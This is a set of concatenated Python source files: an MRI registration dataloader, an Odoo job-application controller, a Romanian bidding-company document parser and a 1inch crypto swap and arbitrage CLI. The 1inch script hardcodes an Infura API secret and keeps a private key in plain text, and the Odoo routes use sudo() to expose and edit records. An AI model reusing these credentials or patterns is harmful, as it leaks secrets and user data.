load\nfrom process.utils import to_tensor\n\n\n\"\"\"\nCustom Dataset inheriting from Pytorch Dataset\nTakes a list of IDs used to load data and associated labels (both generated by get_data_dicts.py)\n\"\"\"\n\nclass Registration_dataset(Dataset):\n\n def __init__(self, list_IDs, transform=None, vectorize=False):\n self.list_IDs = list_IDs\n self.transform = transform\n self.vectorize=vectorize\n\n def __len__(self):\n return len(self.list_IDs)\n \n def __getitem__(self, index):\n \"\"\"\n Main function of the Registration_dataset class. \n Uses MRI_loader.load to load data. 
\n \"\"\"\n item_id_fixed = self.list_IDs[index]\n item_id_moving = self.list_IDs[np.random.randint(0,len(self.list_IDs))] #we select randomly another image to registrate\n \n #fixed_image, moving_image, fixed_mask, moving_mask = load(item_id_fixed, item_id_moving)\n scanners=list(load(item_id_fixed, item_id_moving, self.vectorize))\n\n if self.transform is not None:\n \n if self.vectorize:\n for i, scan in enumerate(scanners):\n if len(scan.shape)>3 :\n scanners[i]=to_tensor(scan,self.transform)\n else :\n scanners[i]=self.transform(scan)\n else :\n for i, scan in enumerate(scanners):\n scanners[i]=self.transform(scan)\n\n return scanners\n \n\n\"\"\"\nGenerated two dataloaders for training and validation.\nUsed utils.get_data_dicts.py to generates the IDs and associated labels in order to instanciate two CustomDatasets.\n\"\"\"\n\ndef get_dataloaders(dataloader_config):\n partition = get_data_dicts(dataloader_config['rootdir'], dataloader_config['valid_ratio'])\n training_set = Registration_dataset(partition['train'],\n dataloader_config['transformation'],\n dataloader_config['vectorize'])\n validation_set = Registration_dataset(partition['validation'], \n dataloader_config['transformation'],\n dataloader_config['vectorize'])\n training_generator = DataLoader(training_set,\n batch_size=dataloader_config['batch_size'],\n shuffle=True)\n validation_generator = DataLoader(validation_set,\n batch_size=dataloader_config['batch_size'],\n shuffle=False)\n return training_generator, validation_generator\n","repo_name":"Sma6500/Last_year_project","sub_path":"src_wth_dice/Dataloaders/registration_loader.py","file_name":"registration_loader.py","file_ext":"py","file_size_in_byte":2950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32049825113","text":"from odoo import http\nfrom odoo.http import request\n\n\nclass Job(http.Controller):\n\n @http.route('/jobs/', auth='public', type='http', website=True)\n def job_application_details(self, **kwargs):\n job_application_details = request.env['job.application'].sudo().search(\n [])\n return request.render('school_management.job_details', {\n 'details': job_application_details})\n\n\nclass desigantion(http.Controller):\n\n MANDETORY_FIELD = [\"name\", \"phone\", \"email\"]\n\n @http.route('/desig/', auth='public', type='http', website=True)\n def job_designation(self, **kwargs):\n designation_details = request.env['job.designation'].sudo().search([])\n\n return request.render('school_management.job_designation', {\n 'des_details': designation_details})\n\n @http.route(['/designation/'], type='http',\n auth='public', website=True)\n def get_click(self, jobs, **kwargs):\n values = {\n 'error': {},\n 'error_message': [],\n 'condition': True\n }\n values.update({'job': jobs.id})\n return request.render(\n 'school_management.create_form', values)\n\n\n # @http.route('/create_job_application', auth='user', type='http',\n # website=True)\n # def create_application(self, **kwargs):\n # values = {\n # 'error': {},\n # 'error_message': [],\n # 'condition': True\n # }\n # if kwargs and request.httprequest.method == 'POST':\n # error, error_message = self.details_form_validate(kwargs)\n\n # values.update({'error': error, 'error_message': error_message})\n # values.update(kwargs)\n # values.update({'condition': values.get('error').get('name', False)})\n # if not error:\n # request.env['job.application'].sudo().create(kwargs)\n # return request.render('school_management.thank_you', {})\n # else:\n # 
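A minimal usage sketch for get_dataloaders above; the dictionary keys mirror the lookups inside the function, while the rootdir path and the other values are placeholders of my own:

# Hypothetical config; keys match what get_dataloaders reads.
dataloader_config = {
    'rootdir': '/data/mri',        # placeholder path
    'valid_ratio': 0.2,
    'transformation': None,        # or any callable transform, e.g. from monai
    'vectorize': False,
    'batch_size': 4,
}

train_loader, val_loader = get_dataloaders(dataloader_config)
for scanners in train_loader:
    print(len(scanners))  # fixed/moving images (and masks) for one batch
    break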
+{"seq_id":"32049825113","text":"from odoo import http\nfrom odoo.http import request\n\n\nclass Job(http.Controller):\n\n @http.route('/jobs/', auth='public', type='http', website=True)\n def job_application_details(self, **kwargs):\n job_application_details = request.env['job.application'].sudo().search(\n [])\n return request.render('school_management.job_details', {\n 'details': job_application_details})\n\n\nclass Designation(http.Controller):\n\n MANDATORY_FIELDS = [\"name\", \"phone\", \"email\"]\n\n @http.route('/desig/', auth='public', type='http', website=True)\n def job_designation(self, **kwargs):\n designation_details = request.env['job.designation'].sudo().search([])\n\n return request.render('school_management.job_designation', {\n 'des_details': designation_details})\n\n @http.route(['/designation/<model(\"job.designation\"):jobs>'], type='http',\n auth='public', website=True)\n def get_click(self, jobs, **kwargs):\n values = {\n 'error': {},\n 'error_message': [],\n 'condition': True\n }\n values.update({'job': jobs.id})\n return request.render(\n 'school_management.create_form', values)\n\n\n # @http.route('/create_job_application', auth='user', type='http',\n # website=True)\n # def create_application(self, **kwargs):\n # values = {\n # 'error': {},\n # 'error_message': [],\n # 'condition': True\n # }\n # if kwargs and request.httprequest.method == 'POST':\n # error, error_message = self.details_form_validate(kwargs)\n\n # values.update({'error': error, 'error_message': error_message})\n # values.update(kwargs)\n # values.update({'condition': values.get('error').get('name', False)})\n # if not error:\n # request.env['job.application'].sudo().create(kwargs)\n # return request.render('school_management.thank_you', {})\n # else:\n # return request.render('school_management.create_form', values)\n\n\n\n # des_id = request.env['job.designation'].sudo().browse(kwargs[\n # 'designation_id'])\n # des_id.sudo().write({'application_ids': [(0, 0, (kwargs))]})\n\n\n def details_form_validate(self, data):\n error = dict()\n error_message = []\n # Validation\n for field_name in self.MANDATORY_FIELDS:\n if not data.get(field_name):\n error[field_name] = 'missing'\n if [err for err in error.values() if err == 'missing']:\n error_message.append('Some required fields are empty.')\n\n return error, error_message\n\n @http.route('/editable_form/<model(\"job.designation\"):job>', auth=\"user\", type=\"http\", website=True)\n def edit_form(self, job, **kwargs):\n\n return request.render('school_management.edit_form', {\n 'name': job.name,\n 'id': job.id})\n\n @http.route('/edit_job_details', auth=\"user\", type=\"http\", website=True)\n def edit_details(self, **kwargs):\n des_id = request.env['job.designation'].sudo().browse(kwargs[\n 'designation_id'])\n des_id.sudo().write({'name': kwargs['name']})\n return request.render('school_management.thank_you', {})\n","repo_name":"kinjal-lalani16/school_management_system","sub_path":"school_management/controllers/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74472847079","text":"\"\"\"\r\nModule that manages the bidding companies\r\n\"\"\"\r\nimport glob\r\nfrom docx import Document\r\nimport re\r\n\r\nLOCATIE_FOLDER_FIRME = r\"./Documente/firme_licitatie/\"\r\nLISTA_FIRME_DISPONIBILE = list()\r\n\r\nclass Firme:\r\n def __init__(self, nume):\r\n \"\"\"\r\n Constructor for the company class\r\n :param nume: the name of the company\r\n \"\"\"\r\n self.nume = nume\r\n # build a list of every possible locomotive\r\n self.lista_locomotive = list()\r\n self.lista_locomotive.append({'model': 'A', 'cantitate': 30, 'viteza': 100, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0})\r\n self.lista_locomotive.append({'model': 'B', 'cantitate': 60, 'viteza': 80, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0})\r\n self.lista_locomotive.append({'model': 'C', 'cantitate': 30, 'viteza': 150, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0})\r\n self.lista_locomotive.append({'model': 'D', 'cantitate': 50, 'viteza': 70, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0})\r\n self.lista_locomotive.append({'model': 'E', 'cantitate': 45, 'viteza': 75, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0})\r\n # build a list of every possible wagon\r\n self.lista_vagoane = list()\r\n self.lista_vagoane.append({'model': 'X12', 'cantitate': 2, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Lemn', 'Busteni', 'Fier']})\r\n self.lista_vagoane.append({'model': 'X14', 'cantitate': 4, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Lemn', 'Busteni', 'Fier']})\r\n self.lista_vagoane.append({'model': 'X13', 'cantitate': 5, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Nisip', 'Cherestea', 'Piatra']})\r\n self.lista_vagoane.append({'model': 'X15', 'cantitate': 4, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Nisip', 'Cherestea', 'Piatra']})\r\n self.lista_vagoane.append({'model': 'X24', 'cantitate': 1, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Apa', 'Benzina']})\r\n self.lista_vagoane.append({'model': 'X23', 'cantitate': 5, 'unitati_disponibile': 0, 
'unitati_folosite': 0, 'cost': 0, 'material': ['Apa', 'Benzina']})\r\n self.lista_vagoane.append({'model': 'X25', 'cantitate': 10, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Apa', 'Benzina']})\r\n self.lista_vagoane.append({'model': 'X5', 'cantitate': 1, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Pasageri']})\r\n self.lista_vagoane.append({'model': 'X10', 'cantitate': 5, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Pasageri']})\r\n self.lista_vagoane.append({'model': 'X30', 'cantitate': 10, 'unitati_disponibile': 0, 'unitati_folosite': 0, 'cost': 0, 'material': ['Pasageri']})\r\n\r\n def adauga_locomotiva(self, model, unitati, cost):\r\n for locomotiva in self.lista_locomotive:\r\n if model == locomotiva['model']:\r\n locomotiva['unitati_disponibile'] = unitati\r\n locomotiva['cost'] = cost\r\n break\r\n\r\n def adauga_vagon(self, model, unitati, cost):\r\n for vagoane in self.lista_vagoane:\r\n if model == vagoane['model']:\r\n vagoane['unitati_disponibile'] = unitati\r\n vagoane['cost'] = cost\r\n break\r\n\r\n\r\ndef citire_document_word(cale: str) -> dict:\r\n \"\"\"\r\n Reads one company's data from a Word document\r\n :param cale: path to the document\r\n :return: a dictionary with the required data\r\n \"\"\"\r\n tmp_dict = dict()\r\n document = Document(cale)\r\n print(cale)\r\n for para in document.paragraphs:\r\n # print(para.text)\r\n detalii_firme = para.text\r\n\r\n # extract the company name\r\n nume_regex = r\"(?<=Nume: ).*$\"\r\n nume_firma = re.findall(nume_regex, detalii_firme)\r\n if nume_firma:\r\n nume_firma = modificare_stringuri(nume_firma)\r\n print(f\"Nume: {nume_firma}\")\r\n tmp_dict['nume'] = nume_firma\r\n\r\n # extract the locomotives\r\n locomotive_regex = r\"(?<=Locomotive: ).*$\"\r\n detalii_locomotive = re.findall(locomotive_regex, detalii_firme)\r\n if detalii_locomotive:\r\n # print(detalii_locomotive)\r\n detalii_locomotive = modificare_stringuri(detalii_locomotive)\r\n # print(detalii_locomotive)\r\n locomotives = str(detalii_locomotive).split(\",\")\r\n\r\n locomotives_lista = list()\r\n for locomotive in locomotives:\r\n locomotive_lista = list()\r\n # print((locomotive).lstrip(' '))\r\n locomotive = ((locomotive).lstrip(' '))\r\n locomotive_model_regex = r\"(?<=Model ).*$\"\r\n locomotive_model = re.findall(locomotive_model_regex, locomotive)\r\n # print(locomotive_model)\r\n\r\n locomotive_cantitate_regex = r\"^.*(?= x)\"\r\n locomotive_cantitate = re.findall(locomotive_cantitate_regex, locomotive)\r\n # print(locomotive_cantitate)\r\n locomotive_cantitate = modificare_stringuri(locomotive_cantitate)\r\n locomotive_model = modificare_stringuri(locomotive_model)\r\n print(f\"Locomotive cantitate: {locomotive_cantitate}\")\r\n print(f\"Locomotive model: {locomotive_model}\")\r\n locomotive_lista.append(locomotive_cantitate)\r\n locomotive_lista.append(locomotive_model)\r\n\r\n # cost\r\n # print(f\"Cost: {cale}\")\r\n for para in document.paragraphs:\r\n # print(para.text)\r\n detalii_cost = para.text\r\n\r\n cost_regex_locomotive = fr\"(?<=Model {locomotive_model} ).*(?= RON/h)\"\r\n cost_locomotive = re.findall(cost_regex_locomotive, detalii_cost)\r\n if cost_locomotive:\r\n cost_locomotive = modificare_stringuri(cost_locomotive)\r\n print(f\"Cost locomotive: {cost_locomotive}\")\r\n locomotive_lista.append(cost_locomotive)\r\n locomotives_lista.append(locomotive_lista)\r\n\r\n tmp_dict['Locomotive'] = locomotives_lista\r\n print(locomotives_lista)\r\n\r\n 
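The extraction in citire_document_word leans on fixed-width lookbehind/lookahead patterns to pull fields out of free text; a standalone mini-example of the same idea, where the sample line is made up by me:

import re

# Hypothetical line in the format the parser expects.
line = "Locomotive: 5 x Model C, 2 x Model B"
detalii = re.findall(r"(?<=Locomotive: ).*$", line)[0]
for part in detalii.split(","):
    part = part.strip()
    model = re.findall(r"(?<=Model ).*$", part)[0]       # text after "Model "
    cantitate = re.findall(r"^.*(?= x)", part)[0]        # text before " x"
    print(cantitate, model)  # -> "5 C", then "2 B"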
# extract the wagons\r\n vagoane_regex = r\"(?<=Vagoane: ).*$\"\r\n detalii_vagoane = re.findall(vagoane_regex, detalii_firme)\r\n if detalii_vagoane:\r\n # print(detalii_vagoane)\r\n detalii_vagoane = modificare_stringuri(detalii_vagoane)\r\n # print(detalii_vagoane)\r\n vagons = str(detalii_vagoane).split(\",\")\r\n\r\n vagones_lista = list()\r\n for vagoane in vagons:\r\n vagoane_lista = list()\r\n # print((vagoane).lstrip(' '))\r\n vagoane = ((vagoane).lstrip(' '))\r\n vagoane_model_regex = r\"(?<=Model ).*$\"\r\n vagoane_model = re.findall(vagoane_model_regex, vagoane)\r\n # print(vagoane_model)\r\n\r\n vagoane_cantitate_regex = r\"^.*(?= x)\"\r\n vagoane_cantitate = re.findall(vagoane_cantitate_regex, vagoane)\r\n # print(vagoane_cantitate)\r\n\r\n vagoane_cantitate = modificare_stringuri(vagoane_cantitate)\r\n vagoane_model = modificare_stringuri(vagoane_model)\r\n print(f\"Vagoane cantitate: {vagoane_cantitate}\")\r\n print(f\"Vagoane model: {vagoane_model}\")\r\n vagoane_lista.append(vagoane_cantitate)\r\n vagoane_lista.append(vagoane_model)\r\n\r\n # cost\r\n # print(f\"Cost: {cale}\")\r\n for para in document.paragraphs:\r\n # print(para.text)\r\n detalii_cost = para.text\r\n\r\n cost_regex_vagoane = fr\"(?<=Model {vagoane_model} ).*(?= RON/h)\"\r\n cost_vagoane = re.findall(cost_regex_vagoane, detalii_cost)\r\n if cost_vagoane:\r\n cost_vagoane = modificare_stringuri(cost_vagoane)\r\n print(f\"Cost vagoane: {cost_vagoane}\")\r\n vagoane_lista.append(cost_vagoane)\r\n\r\n vagones_lista.append(vagoane_lista)\r\n print(vagones_lista)\r\n tmp_dict['Vagoane'] = vagones_lista\r\n\r\n\r\n\r\n # print('TODO: use regex to find the information in each paragraph')\r\n # Populate tmp_dict\r\n # TODO\r\n # example:\r\n # tmp_dict['nume'] = 'FerovTrans SRL'\r\n # tuple per locomotive: (quantity, model, cost)\r\n # tmp_dict['Locomotive'] = [(5, 'C', 20), (2, 'B', 30)]\r\n # # tuple per wagon: (quantity, model, cost)\r\n # tmp_dict['Vagoane'] = [(6, 'X30', 35), (5, 'X14', 45), (20, 'X25', 60)]\r\n print(tmp_dict)\r\n return tmp_dict\r\n\r\ndef modificare_stringuri(stringuri_de_modificare):\r\n char_de_schimbat = \"[]'\"\r\n for ch in char_de_schimbat:\r\n stringuri_de_modificare = str(stringuri_de_modificare).replace(ch, \"\")\r\n\r\n return stringuri_de_modificare\r\n\r\n\r\n\r\ndef salvam_lista_firme_pe_hard():\r\n # TODO: save the list somehow :)\r\n # maybe txt, maybe numpy\r\n pass\r\n\r\n\r\ndef procesare_firme_inscrise():\r\n # find all the documents submitted by the companies\r\n lista_fisier = glob.glob(LOCATIE_FOLDER_FIRME + '/*')\r\n # process the data from every file found\r\n for file in lista_fisier:\r\n tmp_dict = citire_document_word(file)\r\n\r\n LISTA_FIRME_DISPONIBILE.append(Firme(tmp_dict['nume']))\r\n for element in tmp_dict['Locomotive']:\r\n LISTA_FIRME_DISPONIBILE[-1].adauga_locomotiva(model=element[1], unitati=element[0], cost=element[2])\r\n for element in tmp_dict['Vagoane']:\r\n LISTA_FIRME_DISPONIBILE[-1].adauga_vagon(model=element[1], unitati=element[0], cost=element[2])\r\n\r\n salvam_lista_firme_pe_hard()\r\n\r\n\r\nif __name__ == '__main__':\r\n # firma_1 = Firme(nume='Ion')\r\n # print(firma_1)\r\n procesare_firme_inscrise()\r\n","repo_name":"CipiOrhei/ITSchool_2021","sub_path":"procesare_firme.py","file_name":"procesare_firme.py","file_ext":"py","file_size_in_byte":10081,"program_lang":"python","lang":"ro","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38327362450","text":"import requests\nimport json\nimport os\nimport quantumrandom\nimport asyncio\nimport 
numpy as np\nfrom web3 import middleware\nfrom web3.gas_strategies.time_based import fast_gas_price_strategy\n\nos.environ['WEB3_INFURA_PROJECT_ID'] = '90af2ec8351c43f9b82b17026d01a9a1'\nos.environ['WEB3_INFURA_API_SECRET'] = '4c1dd095f5e7411c9b71668b6770e0be'\nfrom web3.auto.infura import w3\n\nwith open('Chi.abi', 'r') as chi_abi_file:\n chi_abi = json.load(chi_abi_file)\nwith open('Gst2.abi', 'r') as gst2_abi_file:\n gst2_abi = json.load(gst2_abi_file)\nwith open('PrivateKey') as privateKeyFile:\n privateKey = privateKeyFile.read()\n\none_inch_split_abi = json.load(open('SplitContract.abi', 'r'))\nmcd_abi = json.load(open('JoinContract.abi', 'r'))\ntoken_abi = json.load(open('Token.abi', 'r'))\n\nchi_contract_address = w3.toChecksumAddress('0x0000000000004946c0e9F43F4Dee607b0eF1fA1c')\ngst2_contract_address = w3.toChecksumAddress('0x0000000000b3F879cb30FE243b4Dfee438691c04')\none_inch_split_contract = w3.toChecksumAddress('0xC586BeF4a0992C495Cf22e1aeEE4E446CECDee0E')\nloop = asyncio.get_event_loop()\n\n\nclass OneInch:\n def __init__(self):\n # json list of tokens\n self.tokens = any\n\n def list_tokens(self):\n if not self.config_check():\n return\n print(\"Tokens: {}\".format(self.tokens))\n\n def load_tokens(self):\n response = requests.get('https://api.1inch.exchange/v1.1/tokens')\n print(\"Loading tokens, status Code: {}\".format(response.status_code))\n self.tokens = json.loads(response.text)\n\n def token_info(self, token):\n if not self.config_check():\n return\n for key, value in self.tokens.items():\n if key.lower() == token.lower():\n print(value)\n return\n print(\"Not Found\")\n\n def generate_address(self):\n private_key = w3.eth.account.create(quantumrandom.hex(1000, 1000))\n print(private_key.address)\n private_key_file = open(\"PrivateKey\", \"w\")\n private_key_file.write(private_key.privateKey.hex())\n private_key_file.close()\n self.privateKey = private_key.privateKey.hex() # reuse the freshly generated key; the module-level file handle is already closed\n print(\"Private key written to file, take care it's in plain text. \"\n \"Calling this function again will overwrite it.\")\n\n def print_current_pub_address(self):\n if not self.config_check():\n return\n account = w3.eth.account.privateKeyToAccount(privateKey)\n print(account.address)\n\n def print_current_balance(self):\n if not self.config_check():\n return\n account = w3.eth.account.privateKeyToAccount(privateKey)\n print(\"Current Balance: {}\".format(w3.fromWei(w3.eth.getBalance(account.address), 'ether')))\n\n def print_current_token_balance(self, token):\n if not self.config_check():\n return\n try:\n token_contract = w3.eth.contract(address=w3.toChecksumAddress(self.get_token_info(token)[\"address\"]),\n abi=token_abi)\n token_balance = token_contract.functions.balanceOf(self.get_public_key()).call()\n token_balance_normalized = w3.fromWei(int(token_balance), 'ether')\n print(\"Current Balance: {} {}\".format(token_balance_normalized, token))\n except Exception:\n print(\"Token not supported\")\n\n async def fetch(self, from_token, to_token, quantity, blocker, focus):\n request = 'https://api.1inch.exchange/v1.1/quote?fromTokenSymbol={0}&' \\\n 'toTokenSymbol={1}&amount={2}&disabledExchangesList=\\'{3}\\''.format(from_token, to_token, quantity,\n blocker)\n return focus, requests.get(request)\n\n def api_arbitrage_detector(self, from_token, to_token, quantity):\n try:\n tasks = [self.fetch(from_token, to_token, quantity, \"\", \"\")]\n focus, swap_from_result = loop.run_until_complete(asyncio.gather(*tasks))[0]\n if swap_from_result.status_code != 200:\n print(\"Failure getting initial quote\")\n return\n print(str(w3.fromWei(int(swap_from_result.json()['fromTokenAmount']), 'ether')) +\n \" \" + swap_from_result.json()['fromToken']['symbol'] + \" to \" +\n str(w3.fromWei(int(swap_from_result.json()['toTokenAmount']), 'ether')) +\n \" \" + swap_from_result.json()['toToken']['symbol'])\n\n exchanges = requests.get('https://api.1inch.exchange/v1.1/exchanges')\n hide = \"\"\n for exchange in exchanges.json():\n hide += exchange[\"name\"] + \",\"\n block_splits = hide[0:len(hide) - 1].split(\",\") # drop only the trailing comma\n\n blockers = []\n\n blocker_1_copy = block_splits.copy()\n blocker_1_copy.remove('Uniswap')\n blockers.append(blocker_1_copy)\n\n blocker_2_copy = block_splits.copy()\n blocker_2_copy.remove('Curve.fi v2')\n blockers.append(blocker_2_copy)\n\n blocker_3_copy = block_splits.copy()\n blocker_3_copy.remove('Curve.fi')\n blockers.append(blocker_3_copy)\n\n blocker_4_copy = block_splits.copy()\n blocker_4_copy.remove('MultiSplit')\n blockers.append(blocker_4_copy)\n\n blocker_5_copy = block_splits.copy()\n blocker_5_copy.remove('Balancer')\n blockers.append(blocker_5_copy)\n\n blocker_6_copy = block_splits.copy()\n blocker_6_copy.remove('Kyber')\n blockers.append(blocker_6_copy)\n\n tasks = []\n for blocker in blockers:\n tasks.append(self.fetch(to_token, from_token,\n int(swap_from_result.json()['toTokenAmount']), \",\".join(blocker),\n self.diff(blocker, block_splits)))\n results = loop.run_until_complete(asyncio.gather(*tasks))\n for result in filter(lambda result: result[1].status_code == 200, results):\n swap_to_json = result[1].json()\n print(str(w3.fromWei(int(swap_to_json['fromTokenAmount']), 'ether')) +\n \" \" + swap_to_json['fromToken']['symbol'] + \" to \" +\n str(w3.fromWei(int(swap_to_json['toTokenAmount']), 'ether')) +\n \" \" + str(swap_to_json['toToken']['symbol']) + \": \" + str(result[0]))\n if int(swap_to_json['toTokenAmount']) > int(swap_from_result.json()['fromTokenAmount']):\n print(\"Arbitrage Detected for: 
{}\".format(result[0]))\n return\n print(\"No Arbitrage Opportunity Detected\")\n except Exception as e:\n print(e)\n\n def quote(self, from_token, to_token, quantity):\n if not self.config_check():\n return\n one_inch_join = w3.eth.contract(address=one_inch_split_contract, abi=one_inch_split_abi)\n contract_response = one_inch_join.functions.getExpectedReturn(\n w3.toChecksumAddress(self.get_token_info(from_token)[\"address\"]),\n w3.toChecksumAddress(self.get_token_info(to_token)[\"address\"]), quantity, 100, 0).call(\n {'from': self.get_public_key()})\n print(\"Swap Quote: {0}\".format(contract_response))\n return contract_response\n\n def swap(self, from_token, to_token, quantity):\n if not self.config_check():\n return\n account = w3.eth.account.privateKeyToAccount(privateKey)\n quote = self.quote(from_token, to_token, quantity)\n min_return = quote[0]\n distribution = quote[1]\n disable_flags = 0\n one_inch_join = w3.eth.contract(address=one_inch_split_contract, abi=one_inch_split_abi)\n nonce = w3.eth.getTransactionCount(self.get_public_key())\n\n print(\"From Token Info: {}\".format(self.get_token_info(from_token)))\n print(\"To Token Info: {}\".format(self.get_token_info(to_token)))\n\n if from_token.lower() == \"eth\":\n value = quantity\n else:\n value = 0\n\n data = one_inch_join.encodeABI(fn_name=\"swap\", args=[\n w3.toChecksumAddress(self.get_token_info(from_token)[\"address\"]),\n w3.toChecksumAddress(self.get_token_info(to_token)[\"address\"]),\n quantity, min_return, distribution, disable_flags])\n\n tx = {\n 'nonce': nonce,\n 'to': one_inch_split_contract,\n 'value': value,\n 'gasPrice': w3.toWei(40, 'gwei'),\n 'from': self.get_public_key(),\n 'data': data\n }\n\n try:\n gas = w3.eth.estimateGas(tx)\n print(\"Gas Supplied: {}\".format(gas))\n tx[\"gas\"] = gas\n except Exception as e:\n print(e)\n return\n\n print('transaction data: {0}'.format(tx))\n\n try:\n signed_tx = w3.eth.account.signTransaction(tx, account.privateKey)\n except Exception as e:\n print(e)\n return False\n try:\n tx_hash = w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n print(\"TXID: {0}\".format(w3.toHex(tx_hash)))\n except Exception as e:\n print(e)\n return False\n\n def get_allowance(self, token):\n if not self.config_check():\n print(\"Call load first to populate tokens\")\n return\n token_info = self.get_token_info(token)[\"address\"]\n token_address = w3.toChecksumAddress(token_info)\n mcd_contract = w3.eth.contract(address=token_address, abi=mcd_abi)\n allowance = mcd_contract.functions.allowance(self.get_public_key(), one_inch_split_contract).call()\n print(\"Current allowance: {0}\".format(allowance))\n return allowance\n\n def approve_tokens(self, token, amount):\n if not self.config_check():\n return\n token_address = w3.toChecksumAddress(self.get_token_info(token)[\"address\"])\n mcd_contract = w3.eth.contract(address=token_address, abi=mcd_abi)\n self.get_allowance(token)\n base_account = w3.eth.account.privateKeyToAccount(privateKey)\n nonce = w3.eth.getTransactionCount(base_account.address)\n data = mcd_contract.encodeABI(fn_name=\"approve\", args=[one_inch_split_contract, amount])\n tx = {\n 'nonce': nonce,\n 'to': token_address,\n 'value': 0,\n 'gasPrice': w3.toWei(40, 'gwei'),\n 'from': base_account.address,\n 'data': data\n }\n\n try:\n gas = w3.eth.estimateGas(tx)\n print(\"Gas Supplied: {}\".format(gas))\n tx[\"gas\"] = gas\n except Exception as e:\n print(e)\n return\n\n try:\n signed_tx = w3.eth.account.signTransaction(tx, privateKey)\n except Exception as e:\n 
print(e)\n return\n try:\n tx_hash = w3.eth.sendRawTransaction(signed_tx.rawTransaction)\n print(\"TXID from 1 Inch: {0}\".format(w3.toHex(tx_hash)))\n except Exception as e:\n print(e)\n return\n\n def get_token_info(self, token):\n if not self.config_check():\n return\n for key in self.tokens:\n if key.lower() == token.lower():\n return self.tokens[key]\n\n def get_public_key(self):\n if not self.config_check():\n return\n account = w3.eth.account.privateKeyToAccount(privateKey)\n return w3.toChecksumAddress(account.address)\n\n @staticmethod\n def format_float(num):\n return np.format_float_positional(num, trim='-')\n\n @staticmethod\n def diff(li1, li2):\n li_dif = [i for i in li1 + li2 if i not in li1 or i not in li2]\n return li_dif\n\n def config_check(self):\n private_key_exists = len(privateKey) != 0\n tokens_populated = self.tokens != any\n if not private_key_exists:\n print(\"Generate a new private key\")\n if not tokens_populated:\n print(\"Load tokens please\")\n return private_key_exists and tokens_populated\n\n\nif __name__ == '__main__':\n\n oneInch = OneInch()\n print(\"Web3 Connected: {}\".format(w3.isConnected()))\n # oneInch.load_tokens()\n w3.middleware_onion.add(middleware.time_based_cache_middleware)\n w3.middleware_onion.add(middleware.latest_block_based_cache_middleware)\n w3.middleware_onion.add(middleware.simple_cache_middleware)\n w3.eth.setGasPriceStrategy(fast_gas_price_strategy)\n while True:\n action = input(\"\\nWhat should I do?\\n[LIST] List Tokens\\n[LOAD] Load Tokens\\n[GENERATE] generate new private key\"\n \"\\n[PRINT] print current pub address\\n[APPROVE] approve token for swap (format: approve \"\n \"<token> <amount>)\\n[QUOTE] request a quote using the 1inch contract (format: quote \"\n \"<from_token> <to_token> <quantity>)\\n[BALANCE] print current Eth balance (format: balance)\"\n \"\\n[TOKENBALANCE] print current token balance (format: tokenbalance <token>)\\n[API] probe 1inch \"\n \"for an arbitrage opportunity (format: api <from_token> <to_token> <quantity>)\"\n \"\\n[ALLOWANCE] check allowance for a specific token (format: allowance <token>)\\n[TOKEN] print \"\n \"token info (format: token <token>)\\n[SWAP] performs an actual swap, if from_token is not Eth, \"\n \"don't forget to approve first (format: swap <from_token> <to_token> <quantity>)\\nType your \"\n \"command here...\").upper()\n if action == 'LIST':\n oneInch.list_tokens()\n elif action == 'LOAD':\n oneInch.load_tokens()\n elif action == \"GENERATE\":\n oneInch.generate_address()\n elif action.startswith(\"TOKENBALANCE\"):\n oneInch.print_current_token_balance(action[12:].strip())\n elif action.startswith(\"TOKEN\"):\n oneInch.token_info(action[5:].strip())\n elif action == \"PRINT\":\n oneInch.print_current_pub_address()\n elif action == \"BALANCE\":\n oneInch.print_current_balance()\n elif action.lower().startswith(\"APPROVE\".lower()):\n splits = action[7:].strip().split()\n if len(splits) < 2:\n print(\"required format \\\"approve {token} {amount}\\\"\")\n else:\n oneInch.approve_tokens(splits[0], w3.toWei(float(splits[1]), 'ether'))\n elif action.lower().startswith(\"API\".lower()):\n splits = action[3:].strip().split()\n if len(splits) < 3:\n print(\"required format \\\"api {fromToken} {toToken} {quantity}\\\"\")\n else:\n oneInch.api_arbitrage_detector(splits[0], splits[1], w3.toWei(float(splits[2]), 'ether'))\n elif action.lower().startswith(\"QUOTE\".lower()):\n splits = action[5:].strip().split()\n if len(splits) < 3:\n print(\"required format \\\"quote {fromToken} {toToken} {quantity}\\\"\")\n else:\n oneInch.quote(splits[0], splits[1], w3.toWei(float(splits[2]), 'ether'))\n elif 
